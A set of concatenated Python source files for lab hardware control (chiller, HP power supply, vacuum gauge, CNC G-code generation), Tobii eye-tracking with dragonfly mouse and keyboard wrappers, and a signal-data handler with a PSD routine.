raise Exception("Timed out waiting for valid reply")
try:
recv = self.recv()
except BadPacket as e:
if self.verbose:
print('WARNING: bad packet %s' % e)
continue
# watchdog
if not recv:
continue
last_cmd, err, response = recv
# ??? shouldn't get this due to flush and such, but just in case
if last_cmd != cmd_code:
if self.verbose:
print('WARNING: unexpected command result %s' % last_cmd)
continue
if err != 'NONE':
raise Exception("Got error: %s" % err)
return response
def mode_select(self, mode):
modei = {
'STAND_BY': 0,
'RUN': 1,
}[mode]
self.cmd('G', str(modei))
def read_memory(self, opt=0):
# 0. Temp & Max Power Setpoint
# TODO: decode
return self.cmd('H', str(opt))
def read_alarm_state(self):
'''
fs : Float Switch
ha : Hi Alarm
la : Low Alarm
sa : Sensor Alarm
pa : EEPROM Fail
wa : Watch dog
'''
fs, ha, la, sa, pa, wa = self.cmd('H')
return fs, ha, la, sa, pa, wa
def serial_watchdog(self):
        '''
NOTE: this command is special, used to init comms
md: mode status
as: alarm status
cs: chiller status
ds: dryer status
'''
md, as_, cs, ds = self.cmd('U')
return md, as_, cs, ds
def monitor_wd(t):
while True:
try:
recv = t.recv()
except BadPacket as e:
print('WARNING: bad packet %s' % e)
continue
print('%s: recv packet: %s' % (datetime.datetime.utcnow().isoformat(), recv))
def run():
t = T251P()
if 0:
while True:
d = t.ser.read()
print(len(d), binascii.hexlify(d))
# verify XON pulse
if 0:
d = t.ser.read()
assert len(d) == 0
t.serial_watchdog()
#t.ser.write('\x2e\x47\x30\x41\x35\x0D')
#monitor_wd(t)
#t.mode_select('RUN')
t.mode_select('STAND_BY')
#print('read_alarm_state', t.read_alarm_state())
def test():
assert cmd_encode('\x47', '\x30') == '\x2e\x47\x30\x41\x35\x0D'
print('Test ok')
run()
#test()
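def demo_codec():
    '''
    Offline framing sketch (no hardware): exercises the helpers above. The 'G0'
    (mode select, STAND_BY) request matches test(); the reply bytes are fabricated
    here for illustration, assuming the two-hex-digit checksum framing described
    in the response format docstring.
    '''
    req = cmd_encode('G', '0')
    print('request: %s' % binascii.hexlify(req))
    reply = '\x23' + 'G' + '0'          # sor + command echo + comm error status
    reply += calc_checksum(reply) + CR  # two ASCII hex checksum chars + cr
    print('decoded: %s %s %r' % response_decode(reply))
#demo_codec()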
```
#### File: uvscada/uvscada/e36.py
```python
import time
import sys
import datetime
import serial
class Timeout(Exception):
pass
def now():
return datetime.datetime.utcnow().isoformat()
def dbg(s):
if 0:
print 'GPIO %s: %s' % (now(), s)
'''
*********************************
Serial
*********************************
Just send commands verbatim
'''
class PUSerial:
def __init__(self, port="/dev/ttyUSB0", baudrate=9600, timeout=0, verbose=False):
self.port = port
self.verbose = verbose
self.ser = serial.Serial(port,
baudrate=baudrate,
bytesize=serial.EIGHTBITS,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
rtscts=False,
dsrdtr=False,
xonxoff=False,
timeout=3,
writeTimeout=0)
self.ser.flushInput()
self.ser.flushOutput()
def interface(self):
return "RS232"
def send_str(self, s):
if self.verbose:
print 'DBG: sending "%s"' % (s)
s += "\n"
self.ser.write(s)
self.ser.flush()
def recv_str(self):
s = self.ser.readline()
s = s.rstrip()
if self.verbose:
print 'DBG: received "%s"' % (s)
return s
def sendrecv_str(self, s):
if self.verbose:
print 'DBG: sending "%s"' % (s)
# send without sleep
self.ser.write(s + '\n')
self.ser.flush()
# wait for response line
s = self.ser.readline()
s = s.rstrip()
if self.verbose:
print 'DBG: received "%s"' % (s)
return s
def version(self):
return 'N/A'
'''
outp: 1 or 2
Device tracks which is currently enabled
By default commands act on the last selected output
Option argument to per-output commands can switch output if not already selected
'''
class E36:
def __init__(self, io, verbose=False):
self.verbose = verbose
self.vendor = None
self.model = None
# Active rail for commands, unknown at init
self.outp = None
self.io = io
# Make sure simple queries work
if not self.version():
raise Exception("Failed init %s" % (io.interface()))
'''
*********************************8
MISC
*********************************8
'''
def version(self):
return self.io.sendrecv_str("SYSTEM:VERSION?")
def ident(self):
# just vendor, model
return self.ident_ex()[0:2]
def ident_ex(self):
'''
PS ident: ['HEWLETT-PACKARD', 'E3632A', '0', '1.1-5.0-1.0']
'''
ret = self.io.sendrecv_str("*IDN?").split(',')
self.vendor = ret[0]
self.model = ret[1]
sn = ret[2]
fw = ret[3]
return (self.vendor, self.model, sn, fw)
def remote(self):
'''Put into remote mode? Required before running any commands'''
self.io.send_str("SYSTEM:REMOTE")
def local(self):
'''Put into local mode? Evidently displays better'''
#self.io.send_str("SYSTEM:LOCAL") # to make display updates in real time
# for some reason you need to issue the GPIB instead of the device local command
self.io.local()
def off(self, tsleep=0.2):
'''Turn off both outputs'''
self.io.send_str("OUTPUT OFF")
# Copied from on. Needed?
time.sleep(tsleep)
def on(self, tsleep=0.2):
'''Turn on both outputs'''
self.io.send_str("OUTPUT ON")
# 0.1 causes error, 0.15 fine
time.sleep(tsleep)
# .15 worked + some margin
def set_outp(self, outp, tsleep=0.25):
'''Force selecting given rail'''
if not outp in (1, 2):
raise Exception('Bad outp %s' % (outp,))
# FIXME: hack
if self.model == 'E3632A':
return
self.io.send_str("INSTRUMENT:SELECT OUTP%d" % outp)
self.outp = outp
time.sleep(tsleep)
def disp_vi(self, outp=None):
'''display actual currents on front panel'''
# FIXME: hack
if self.model == 'E3632A':
return
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("DISP:MODE VI")
def wait_ready(self):
'''
Generally, it is best to use the "Operation Complete" bit (bit
0) in the Standard Event register to signal when a command
sequence is completed. This bit is set in the register after an
*OPC command has been executed. If you send *OPC after a
command which loads a message in the power supply's
output buffer (query data), you can use the "Operation
Complete" bit to determine when the message is available.
However, if too many messages are generated before the
*OPC command executes (sequentially), the output buffer
will overload and the power supply will stop processing
commands.
'''
while True:
print "sending *OPC?"
self.io.send_str("*OPC?\012")
self.ser.flush()
rx = self.ser.readline(100).rstrip()
print "got ",rx
if(rx == "1"):
break
def apply(self, voltage, current, outp=None):
'''Set both voltage and current at once?'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("APPL %s,%s" % (voltage, current))
'''
Errors are retrieved in the first- in- first- out (FIFO) order.
The first error returned is the first error that was stored.
Errors are cleared as you read them. When you have read all
errors from the queue, the ERROR annunciator turns off and
the errors are cleared. The power supply beeps once each
time an error is generated.
If more than 20 errors have occurred, the last error stored
in the queue (the most recent error) is replaced with
- 350, "Queue overflow". No additional errors are stored until
you remove errors from the queue. If no errors have
occurred when you read the error queue, the power supply
responds with +0, "No error" over the remote interface or NO
ERRORS from the front panel.
The error queue is cleared by the *CLS (clear status)
command or when power is cycled. The errors are also
cleared when you read the queue.
The *RST (reset) command does not clear the error queue.
'''
def beep(self):
'''Call this to annoying your labmates'''
self.io.send_str("SYSTEM:BEEPER")
def text(self, s):
'''Call this to put creepy messages directly on the display'''
if len(s) > 11:
raise Exception('string too long')
self.io.send_str("DISPLAY:TEXT \"%s\"" % (s,))
def text_clr(self):
self.io.send_str("DISPlay:TEXT:CLEar")
def rst(self, tsleep=1.0):
'''Reset the device except for errors'''
self.io.send_str("*RST")
# Device locks up for a bit
time.sleep(tsleep)
def clr(self):
'''Clear error queue'''
self.io.send_str("*CLS")
def get_err(self):
'''Get next error from queue'''
return self.io.sendrecv_str("SYST:ERR?")
'''
*********************************8
CURRENT
*********************************8
'''
def curr(self, outp=None):
'''Get current reading'''
return float(self.io.sendrecv_str("MEAS:CURR?"))
def curr_max(self, outp=None):
'''Get current setpoint as set by set_curr'''
return float(self.io.sendrecv_str("CURR?"))
def set_curr(self, current, outp=None):
'''Set current limit on given output'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("CURR %3.3f" % current)
'''
*********************************8
VOLTAGE
*********************************8
'''
# 0.185 s over serial
def volt(self, outp=None):
'''Get voltage reading'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
return float(self.io.sendrecv_str("MEAS:VOLT?"))
def volt_max(self, outp=None):
'''Get voltage setpoint'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
return float(self.io.sendrecv_str("VOLT?"))
def set_volt(self, volt, outp=None):
'''Set voltage limit on given output'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("VOLT %3.3f" % (volt,))
def set_ovp(self, volt, outp=None):
'''Set over voltage protection limit on given output'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("VOLTAGE:PROT %3.3f" % (volt,))
def ovp_enb(self, outp=None):
'''Enable over voltage protection'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("VOLTAGE:PROT:STATE ON")
def ovp_dis(self, outp=None):
'''Disable over voltage protection'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("VOLTAGE:PROT:STATE OFF")
def ovp_clr(self, outp=None):
'''Clear voltage protect fault?'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("VOLTAGE:PROT:CLEAR")
def print_errors(ps):
print 'Errors:'
errors = []
while True:
s = ps.get_err()
if s == '+0,"No error"':
break
errors.append(s)
if errors:
for error in errors:
print ' %s' % error
else:
print ' None'
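if __name__ == "__main__":
    # Read-only usage sketch (assumption: a supply is attached on /dev/ttyUSB0).
    # Only queries are issued; no outputs are switched.
    io = PUSerial(port="/dev/ttyUSB0", verbose=True)
    ps = E36(io)
    ps.remote()
    print 'Ident: %s %s' % ps.ident()
    print 'V=%0.3f I=%0.3f' % (ps.volt(1), ps.curr())
    print_errors(ps)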
```
#### File: uvscada/uvscada/gp307.py
```python
import serial
# like on the display
def fmt(f):
return '%1.1E' % f
class GP307(object):
def __init__(self, port="/dev/ttyUSB0", ser_timeout=10.0, ser=None):
self.verbose = 0
if not ser:
ser = serial.Serial(port,
baudrate=9600,
bytesize=serial.EIGHTBITS,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
rtscts=False,
dsrdtr=False,
xonxoff=False,
timeout=ser_timeout,
# Blocking writes
writeTimeout=None)
self.ser = ser
self.ser.flushInput()
self.ser.flushOutput()
self.mode = None
self.flush()
def flush(self):
'''
measurements every 5 seconds
9600 baud
1200 bytes / sec => 0.83 * 9/8 = 0.93 ms/char
27 char message
min transmit time: 27 * 0.93 = 25 ms
should ideally flush for that in case we start in the middle of a message
probably not that efficient..wait at least double
'''
timeout = self.ser.timeout
try:
self.ser.timeout = 0.1
while True:
l = self.ser.readline()
# finished command in progress => flushed
if not l:
return
# a finished command => done
if l[-1] == '\n':
return
finally:
self.ser.timeout = timeout
def get(self):
'''Return ion gauge, TC A, TC B. Up to 5 seconds on healthy system'''
# 9.90E+09,6.10E-02,9.90E+09
l = self.ser.readline().strip()
#print l
ig, a, b = l.split(',')
return float(ig), float(a), float(b)
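if __name__ == '__main__':
    # Minimal usage sketch: poll a single reading (the gauge pushes a line about
    # every 5 seconds, so get() can block for several seconds).
    gp = GP307()
    ig, a, b = gp.get()
    print 'IG %s  TC-A %s  TC-B %s' % (fmt(ig), fmt(a), fmt(b))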
```
#### File: uvscada/uvscada/ngc.py
```python
import sys
from os import path
cnc = None
class CNC(object):
def __init__(self, em=-1, rpm=None, fr=2.0, fr_z=1.0, verbose=False):
# was default 1./8
# for drilling?
if em is not None and em <= 0:
raise ValueError("Invalid endmill diameter")
# Endmill diameter
self.em = em
# Z rising to clear part ("chaining")
# Slow withdrawl in material
self.clear_zps = 0.050
# After material clear
self.clear_zp = 0.100
# Depth to go all the way through the part
self.clear_zn_u = -0.020
# Distance between finishing pass contours
self.finish_u = 0.005
# Main feedrate (xy)
self.fr = fr
# Plunge feedrate
self.fr_z = fr_z
self.rpm = rpm
self.verbose = verbose
# Name output .ngc same as the generating python file
# Could support multiple files by adding an open function if needed
m_fn = path.abspath(sys.modules['__main__'].__file__)
ngc_fn = m_fn.replace('.py', '.ngc')
if ngc_fn.find('.ngc') < 0:
raise Exception("Failed to replace extension")
# Output file
self.f = open(ngc_fn, 'w')
self.chain = clear_z
def init(*args, **kwargs):
global cnc
cnc = CNC(*args, **kwargs)
start()
return cnc
def line(s='', verbose=None):
if verbose is None:
verbose = cnc.verbose
cnc.f.write(s + '\n')
if verbose:
print s
def comment(s):
if s.find('(') >= 0:
raise ValueError("Nested comment")
line('(%s)' % s)
def comment_block(s):
comment('*' * 80)
comment(s)
comment('*' * 80)
def start():
if cnc.em is None:
comment('Endmill: none. Drill only')
else:
comment('Endmill: %0.4f' % cnc.em)
line('G90')
clear_zq()
rpm(cnc.rpm)
def rpm(val):
line('M3 S%0.1f' % val)
def end():
line()
# Make sure don't crash
clear_zq()
line('G0 X0 Y0')
line('M30')
def fmt(f):
return '%+0.3f' % f
def clear_z():
line('G1 Z%0.3f F%0.3f' % (cnc.clear_zps, cnc.fr_z))
line('G0 Z%0.3f' % cnc.clear_zp)
def clear_zq():
line('G0 Z%0.3f' % cnc.clear_zp)
def clear_zn():
line('G0 Z%0.3f' % cnc.clear_zps)
line('G1 Z%0.3f F%0.3f' % (cnc.clear_zn_u, cnc.fr_z))
# Exact clearance
def clear_ep(pos):
line('(ClearE+ %0.3f)' % pos)
return '%0.3f' % (pos + cnc.em/2)
def clear_en(pos):
line('(ClearE- %0.3f)' % pos)
return '%0.3f' % (pos - cnc.em/2)
# Delta clearance
def clear_dp(pos):
line('(Clear+ %0.3f)' % pos)
return '%0.3f' % (pos + cnc.em/2 + 0.25)
def clear_dn(pos):
line('(Clear- %0.3f)' % pos)
return '%0.3f' % (pos - cnc.em/2 - 0.25)
def g0(x=None, y=None, z=None):
xstr = ''
ystr = ''
zstr = ''
if x is not None:
xstr = ' X%s' % fmt(x)
if y is not None:
ystr = ' Y%s' % fmt(y)
if z is not None:
zstr = ' Z%s' % fmt(z)
line('G0%s%s%s' % (xstr, ystr, zstr))
def g1(x=None, y=None, z=None):
xstr = ''
ystr = ''
zstr = ''
if x is not None:
xstr = ' X%s' % fmt(x)
if y is not None:
ystr = ' Y%s' % fmt(y)
if z is not None:
zstr = ' Z%s' % fmt(z)
line('G1%s%s%s F%0.3f' % (xstr, ystr, zstr, cnc.fr))
def m0():
line('M0')
def m1():
line('M1')
# Cut rectangle with upper left coordinate given
# Cutter centered on rectangle
def rect_slot_ul(x, y, w, h, com=True, chain=True, leadin='g0'):
if com:
line()
line('(rect_slot_ul X%s Y%s W%s H%s)' % (fmt(x), fmt(y), fmt(w), fmt(h)))
if leadin == 'g0':
g0(x, y)
clear_zn()
elif leadin == 'g1':
g1(x, y)
else:
raise Exception("Oops")
g1(x + w, y + 0)
g1(x + w, y + h)
g1(x + 0, y + h)
g1(x + 0, y + 0)
if chain:
cnc.chain()
# Cut rectangle, compensating to cut inside of it
# Endmill is assumed to be square
def rect_in_ul(x, y, w, h, finishes=1, chain=True, com=True):
if com:
line()
line('(rect_in_ul X%s Y%s W%s H%s)' % (fmt(x), fmt(y), fmt(w), fmt(h)))
# Roughing pass
if finishes:
if finishes != 1:
raise Exception("FIXME")
line('(Rough)')
rect_slot_ul(x + cnc.em/2 + cnc.finish_u, y + cnc.em/2 + cnc.finish_u, w - cnc.em - cnc.finish_u, h - cnc.em - cnc.finish_u, com=False, chain=False)
# Finishing pass
line('(Finish)')
rect_slot_ul(x + cnc.em/2, y + cnc.em/2, w - cnc.em, h - cnc.em, com=False, chain=chain, leadin='g1')
else:
# Finishing pass
rect_slot_ul(x + cnc.em/2, y + cnc.em/2, w - cnc.em, h - cnc.em, com=False, chain=chain)
def rect_in_cent(x, y, w, h, *args, **kwargs):
x0 = x - w/2
y0 = y - h/2
if kwargs.get('com', True):
line()
line('(rect_in_cent X%s Y%s W%s H%s)' % (fmt(x), fmt(y), fmt(w), fmt(h)))
kwargs['com'] = False
rect_in_ul(x0, y0, w, h, *args, **kwargs)
'''
G2: clockwise arc
G3: counterclockwise arc
'''
def circ_cent_slot(x, y, r, cw=False, com=True, leadin='g0', chain=True):
if com:
line()
line('(circ_cent_slot X%sf Y%s R%s)' % (fmt(x), fmt(y), fmt(r)))
# Arbitrarily start at left
x0 = x - r
if leadin == 'g0':
g0(x0, y)
clear_zn()
elif leadin == 'g1':
g1(x0, y)
else:
raise Exception("Oops")
line('G3 I%0.3f F%0.3f' % (r, cnc.fr))
if chain:
cnc.chain()
# Cut circle centered at x, y
# Leaves a hole the size of r
def circ_cent_in(x, y, r):
line()
line('(circ_cent_in X%s Y%s R%s)' % (fmt(x), fmt(y), fmt(r)))
raise Exception("FIXME")
# Cut circle centered at x, y
# Leaves a cylinder the size of r
def circ_cent_out(x, y, r, finishes=1):
line()
line('(circ_cent_out X%s Y%s R%s)' % (fmt(x), fmt(y), fmt(r)))
# Roughing pass
if finishes:
if finishes != 1:
raise Exception("FIXME")
line('(Rough)')
circ_cent_slot(x, y, r + cnc.em + cnc.finish_u, cw=True, com=False, chain=False)
line('(Finish)')
circ_cent_slot(x, y, r + cnc.em, cw=False, com=False, leadin='g1')
else:
circ_cent_slot(x, y, r + cnc.em, cw=False, com=False)
def endrange(start, end, inc, finish=0.001, com=False):
'''Inclusive float range(): ending at end instead of beginning like range does'''
if com:
comment('endrange %0.3f, %0.3f, %0.3f, finish=%0.3f' % (start, end, inc, finish))
ret = []
if inc < 0:
raise ValueError()
if finish:
ret.append(end)
pos = end + finish
else:
pos = end
if start < end:
while pos > start:
ret.append(pos)
pos -= inc
else:
while pos < start:
ret.append(pos)
pos += inc
ret.reverse()
return ret
'''
for cutting a pocket with the edge at the bottom (below y)
pre-chain:
endmill should be below the part edge
it will rapid move x into position and then actuate y
post-chain
endmill will be in lower right corner
align
lr: lower right
goes left right
coordinates relative to align
'''
def pocket_lr(x, y, w, h, finishes=1, finish_only=False):
'''
# clear Y
g0(y=(cnc.em/2 + 0.05))
# Back to X
g0(x=-(x + cnc.em/2))
for y in endrange(-(y + cnc.em / 2), -(y + h - cnc.em / 2), cnc.em/2):
g1(y=y)
g1(x=-(x + w + cnc.em / 2))
# Clear
g0(x=-(x + cnc.em / 2))
'''
comment('pocket_lr X%0.3f Y%0.3f W%0.3F H%0.3F' % (x, y, w, h))
# left, right
# upper, lower
xl = x - w + cnc.em/2
xr = x - cnc.em/2
yu = y - h + cnc.em/2
yl = y - cnc.em/2
finish = 0.005
if finishes:
comment('Finish: %d %0.3f' % (finishes, finish))
# unfinished boundary
if finishes:
xl_uf = xl + finish
xr_uf = xr - finish
yu_uf = yu + finish
yl_uf = yl - finish
else:
xl_uf = xl
xr_uf = xr
yu_uf = yu
yl_uf = yl
line()
comment("chain to lower right corner")
# clear Y
y_clear = y + cnc.em/2 + 0.05
g0(y=y_clear)
for ythis in endrange(y, yu_uf, cnc.em/2, finish=0, com=True):
if finish_only:
continue
line()
comment('y=%.03f' % ythis)
# clear
g0(x=xl_uf)
# feed into material
g1(y=ythis)
# cut
g1(x=xr_uf)
if finish_only:
g0(x=xr_uf)
line()
# cutter is at right
# slowly cut to return y, clearing the nubs
comment('cut nubs')
g1(y=y_clear)
line()
comment('pocket perimeter')
# Now do finishing pass around
# Return known location
# WARNING: right side will have nubs
# clear, moving to lower right avoiding nubs
#g0(x=xl_uf)
#g0(y=y_clear)
#g0(x=xr_uf)
# and dig in for the perimeter cut
#g1(x=xr, y=yl)
# TODO: verify chain
# chain good
# line('M1')
# Now carve out
def perim(delta):
comment('perim w/ delta %0.3f' % delta)
comment('chain to lr')
g1(x=xr - delta)
g1(y=yl - delta)
comment('lr to ur')
g1(xr - delta, yu + delta)
comment('ur to ul')
if finish_only:
g0(xl + delta, yu + delta)
else:
g1(xl + delta, yu + delta)
comment('ul to ll')
g1(xl + delta, yl - delta)
# already cut
#comment('ll to lr')
#g1(xr - delta, yl - delta)
#if finishes:
# perim(finish)
perim(0.0)
# chain to edge
g1(y=y_clear)
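# Usage sketch (illustrative feeds/endmill; this module names the output .ngc
# after the importing generator script):
#   import ngc
#   ngc.init(em=0.125, rpm=5000, fr=2.0, fr_z=1.0)
#   ngc.comment_block('demo part')
#   ngc.rect_in_cent(0.0, 0.0, 1.0, 0.5)
#   ngc.circ_cent_out(0.0, 0.0, 0.25)
#   ngc.end()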
```
#### File: uvscada/uvscada/ppro_util.py
```python
from uvscada.ppro import parse
import binascii
import time
import json
def load_logs(fn, progt=5.0, limit=None, convert=True):
return [data for _t, data in gen_logs(fn, progt, limit, convert=convert)]
def load_logst(fn, progt=5.0, limit=None, convert=True):
return list(gen_logs(fn, progt, limit, convert=convert))
def gen_logs(fn, progt=5.0, limit=None, verbose=False, convert=True):
tprint = time.time()
errs = 0
for itr, l in enumerate(open(fn)):
if limit and not limit(itr):
continue
if time.time() - tprint > progt:
print '%d' % itr
tprint = time.time()
l = l.strip()
if not l:
continue
try:
j = json.loads(l)
except:
# Truncated record?
if itr > 1:
continue
raise
raw = binascii.unhexlify(j['data'])
try:
dec = parse(raw, convert=convert)
except ValueError as e:
# Lots of CRC errors
# Ocassional sequence errors
if verbose:
print 'WARNING: %s bad packet: %s' % (itr, e)
errs += 1
continue
except Exception:
print itr
raise
yield (j['t'], dec)
if verbose:
print '%d packet errors' % errs
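# Usage sketch ('capture.jl' is a placeholder path):
#   for t, dec in gen_logs('capture.jl', verbose=True):
#       ...   # dec is one parsed packet, t its capture timestamp
# or load everything up front with load_logst('capture.jl').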
``` |
{
"source": "JohnDoe02/gaze-ocr",
"score": 3
} |
#### File: gaze-ocr/gaze_ocr/_dragonfly_wrappers.py
```python
import dragonfly
class Mouse(object):
def move(self, coordinates):
dragonfly.Mouse("[{}, {}]".format(*coordinates)).execute()
def click(self):
dragonfly.Mouse("left").execute()
def click_down(self):
dragonfly.Mouse("left:down").execute()
def click_up(self):
dragonfly.Mouse("left:up").execute()
def scroll_down(self, n=1):
dragonfly.Mouse("wheeldown:{}".format(n)).execute()
def scroll_up(self, n=1):
dragonfly.Mouse("wheelup:{}".format(n)).execute()
class Keyboard(object):
def type(self, text):
dragonfly.Text(text.replace("%", "%%")).execute()
def shift_down(self):
dragonfly.Key("shift:down").execute()
def shift_up(self):
dragonfly.Key("shift:up").execute()
def left(self, n=1):
dragonfly.Key("left:{}".format(n)).execute()
def right(self, n=1):
dragonfly.Key("right:{}".format(n)).execute()
class Windows(object):
def get_monitor_size(self):
primary = dragonfly.Monitor.get_all_monitors()[0]
return (primary.rectangle.dx, primary.rectangle.dy)
def get_foreground_window_center(self):
window_position = dragonfly.Window.get_foreground().get_position()
return (window_position.x_center, window_position.y_center)
```
#### File: gaze-ocr/gaze_ocr/eye_tracking.py
```python
import sys
import etpy
from . import _dragonfly_wrappers as dragonfly_wrappers
class EyeTracker(object):
_instance = None
@classmethod
def get_connected_instance(cls, *args, **kwargs):
if not cls._instance:
cls._instance = cls(*args, **kwargs)
if not cls._instance.is_connected:
cls._instance.connect()
return cls._instance
def __init__(self,
tobii_dll_directory,
mouse=dragonfly_wrappers.Mouse(),
keyboard=dragonfly_wrappers.Keyboard(),
windows=dragonfly_wrappers.Windows()):
self._mouse = mouse
self._keyboard = keyboard
self._windows = windows
# Attempt to load eye tracker DLLs.
global clr, Action, Double, Host, GazeTracking
try:
import clr
from System import Action, Double
sys.path.append(tobii_dll_directory)
clr.AddReference("Tobii.Interaction.Model")
clr.AddReference("Tobii.Interaction.Net")
from Tobii.Interaction import Host
from Tobii.Interaction.Framework import GazeTracking
self.is_mock = False
except:
print("Eye tracking libraries are unavailable.")
self.is_mock = True
self._host = None
self._gaze_point = None
self._gaze_state = None
self._screen_scale = (1.0, 1.0)
self._head_rotation = None
self.is_connected = False
self.tobii4c = etpy.Tobii4c()
def connect(self):
if self.is_mock:
return
self._host = Host()
# Connect handlers.
screen_bounds_state = self._host.States.CreateScreenBoundsObserver()
screen_bounds_state.Changed += self._handle_screen_bounds
gaze_state = self._host.States.CreateGazeTrackingObserver()
gaze_state.Changed += self._handle_gaze_state
gaze_points = self._host.Streams.CreateGazePointDataStream()
action = Action[Double, Double, Double](self._handle_gaze_point)
gaze_points.GazePoint(action)
head_pose = self._host.Streams.CreateHeadPoseStream()
head_pose.Next += self._handle_head_pose
self.is_connected = True
print("Eye tracker connected.")
def disconnect(self):
if not self.is_connected:
return
self._host.DisableConnection()
self._host = None
self._gaze_point = None
self._gaze_state = None
self.is_connected = False
print("Eye tracker disconnected.")
def _handle_screen_bounds(self, sender, state):
if not state.IsValid:
print("Ignoring invalid screen bounds.")
return
bounds = state.Value
monitor_size = self._windows.get_monitor_size()
self._screen_scale = (monitor_size[0] / float(bounds.Width),
monitor_size[1] / float(bounds.Height))
def _handle_gaze_state(self, sender, state):
if not state.IsValid:
print("Ignoring invalid gaze state.")
return
self._gaze_state = state.Value
def _handle_gaze_point(self, x, y, timestamp):
self._gaze_point = (x, y, timestamp)
def _handle_head_pose(self, sender, stream_data):
pose = stream_data.Data
self._head_rotation = (pose.HeadRotation.X,
pose.HeadRotation.Y,
pose.HeadRotation.Z)
def has_gaze_point(self):
return (not self.is_mock and
self._gaze_state == GazeTracking.GazeTracked and
self._gaze_point)
def get_gaze_point_or_default(self):
self._gaze_point = self.tobii4c.getGaze()
print("gaze point x: ", self._gaze_point[0])
print("gaze point y: ", self._gaze_point[1])
if self.has_gaze_point() or True:
return (1920 + self._gaze_point[0] * self._screen_scale[0] * 1920,
self._gaze_point[1] * self._screen_scale[1] * 1200)
else:
return self._windows.get_foreground_window_center()
def print_gaze_point(self):
if not self.has_gaze_point():
print("No valid gaze point.")
return
print("Gaze point: (%f, %f)" % self._gaze_point[:2])
def move_to_gaze_point(self, offset=(0, 0)):
gaze = self.get_gaze_point_or_default()
x = max(0, int(gaze[0]) + offset[0])
y = max(0, int(gaze[1]) + offset[1])
self._mouse.move((x, y))
def type_gaze_point(self, format):
        self._keyboard.type(format % self.get_gaze_point_or_default())  # Keyboard.type() already executes
def get_head_rotation_or_default(self):
return self._head_rotation or (0, 0, 0)
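# Usage sketch (assumes the Tobii interaction DLLs are installed; the directory
# below is a placeholder):
#   tracker = EyeTracker.get_connected_instance(r"C:\Tobii\dlls")
#   tracker.move_to_gaze_point(offset=(0, 0))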
``` |
{
"source": "JohnDoe2576/MRAC",
"score": 2
} |
#### File: JohnDoe2576/MRAC/Data_Handler.py
```python
import numpy as np
import pandas as pd
import pickle as pkl
import bz2
class Data_Handler:
def __init__(self, dat_par):
self.filename = dat_par.filename
self.fileno = dat_par.fileno
def loaddata(self):
# Open file object
comp_file = self.filename + "_" + self.fileno + ".bz2"
f = bz2.BZ2File(comp_file, 'rb')
# Unpickle data
dat = pkl.load(f)
f.close()
# Extracting data
t = np.array(dat['t'])
u = np.array(dat['u'])
y = np.array(dat['y'])
# Return obtained data
return t,u,y
def savedata(self, t, u, y):
# Plug data in pandas DataFrame
dat = pd.DataFrame({'t':t, 'u':u, 'y':y})
# Compress using bzip2 format
comp_file = self.filename + "_" + self.fileno + ".bz2"
f = bz2.BZ2File(comp_file, 'wb')
# Pickle data
pkl.dump(dat, f)
f.close()
def cal_psd( x, **parms ):
# Assumptions:
# 1. 'x' is a 2D array of data measured/sampled at unformly spaced
# instants. The data measured/sampled from a particular channel
# is given along axis0, and channel numbering is given along
# axis1.
# 2. In all cases, the code returns PSD in the positive direction
# of f-axis, and then doubling the energy in it to account for
# the energy inthe negative direction of f-axis. This is based
# on an assumption of typical symmetries of PSD(-f) = PSD(+f).
# Also note that, in the event that 'x' is complex, x(-f) ~= x(f).
# 3. Each channel data is divided into blocks of size 'nfft'with a
# 'overlap_pcnt' percentage of overlap between them, and the PSD
# over each of the blocks are averaged. Furthermore, to avoid a
# situation where few samples being unused towards the end, the
# overlap between last and last-but-one block can be larger.
    # 4. PSD has units ((Unit of 'x') ** 2)/(\Delta Hz). '\Delta Hz'
# is a reflection of the fact that PSD is the density per unit
# width of the frequency bins. In other words, \int {(PSD) (df)}
# is the power of the signal irrespective of frequency parameters
# like 'nfft' or 'fs'
#
# Input parameters:
# x: Time-series (2D array)
# nfft: Frequency points used to calculate DFT
# fs: Sampling frequency
# window: Windowing function
    #     ovlp_pcnt: Percentage overlap between successive blocks
#
# Output parameters:
# PSD: Power Spectral Density in ((Units of x) ** 2)/(Delta Hz)
# f: Frequency axis
# Extracting parameters
nfft = parms['nfft'] # Number of frequency points
fs = parms['fs'] # Sampling frequency
window = parms['window'] # Windowing function
overlap_pcnt = parms['ovlp_pcnt'] # Percentage of overlap
# Get windowing function and weights (for normalization later)
dat_wndw = np.diag(window(nfft))
    wndw_weight = np.mean(np.power(np.diag(dat_wndw), 2))
# Return distinct non-negative frequencies less than Nyquist
nfrq = int(np.ceil((nfft+1)/2))
# Create frequency axis
f = np.arange(0,nfrq,1)*(fs/nfft)
# Samples to overlap between successive blocks
noverlap = 0.01 * nfft * overlap_pcnt
# Samples by which one block is shifted from next
blk_shift = nfft - noverlap
# Number of samples
n_smpl = len(x)
# Number of blocks to average over
nblks = np.ceil((n_smpl - noverlap)/blk_shift)
# Calculating Power Spectral Density
# ----------------------------------
#
    # Pre-initializing PSD matrix
PSD = np.zeros(x.shape)
PSD = PSD[0:nfft,]
for blk in range(0,int(nblks)):
# Starting index of each block
blk_strt_idx = int(min([(blk*blk_shift + nfft), n_smpl]) - nfft)
# Indices of current block
        blk_curr_idx = np.arange(0,int(nfft),dtype=int) + blk_strt_idx
# Convolve window function with each block and take the Fourier transform
p_f = np.fft.fft(np.matmul(dat_wndw,x[blk_curr_idx,]),n=nfft,axis=0)
# Add square of DFT to running sum
PSD = PSD + np.power( np.abs(p_f), 2 )
# Average out values from all blocks
PSD = PSD/nblks
# Account for neglected energy (Refer Assumption 2)
# -------------------------------------------------
#
# Axis folding:
# 1. Selecting positive frequency axis
# 2. Knocking-off 'Zero' and 'Nyquist' frequencies
nfrq_pos = int(np.floor((nfft+1)/2) - 1)
nfrq_pos_idx = np.array(range(0,nfrq_pos))
# Double the energy (Assumption 2)
